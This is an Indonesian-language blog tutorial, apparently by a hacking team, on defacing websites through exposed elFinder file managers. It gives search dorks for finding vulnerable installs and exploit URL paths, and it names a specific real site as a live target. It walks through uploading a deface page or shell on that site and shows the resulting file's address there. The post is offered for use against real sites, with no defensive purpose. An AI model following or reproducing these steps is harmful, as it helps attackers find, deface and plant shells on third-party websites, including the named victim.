Deface Poc Elfinder

Hallo Lort comeback sama mimin Saddam21

Kali ini gw mo kasih tutor lagi nih yaitu tutor Deface Poc Elfinder





Bahan:


-Hp/Pc


-Internet


-Chrome/Browser


-Dork


-Exploit


-Sc Deface


Dork:


inurl: “elfinder / elfinder.html”


inurl:/elfinder/elfinder.php.html


inurl:/elfinder/files/


inurl:/_file-manager/php/connector.php


Kembangin lagi make otak heker kalian


Exploit:


http://site.com/%5Bpath%5D/elfinder/elfinder.html


http://site.com/%5Bpath%5D/elfinder/elfinder.php.html


Karna gua udah ada live target jadi ga usah ngedork lagi


Target


http://euromed.com.eg/sites/all/libraries/elfinder/elfinder.php.html



Pertama kalian dorking dulu. (Karna mimin ada live target jadi mimin pakai live target)




Jika tampilan seperti di atas maka vuln...

Bang gimana cara upload sc kita? Shell kita? Kalian klik yang ada gambar panah lalu di upload


Mimin bakal upload html saja




Jika sudah klik oke.

Jika sudah terupload maka ada nama file kita di web.



Cara akses?

http://target.com.eg/sites/all/libraries/elfinder/files/scluh.html


Contoh:

http://euromed.com.eg/sites/all/libraries/elfinder/files/read.html





Jangan lupa subscribe channel team kami.





إرسال تعليق

Post a Comment (0)

أحدث أقدم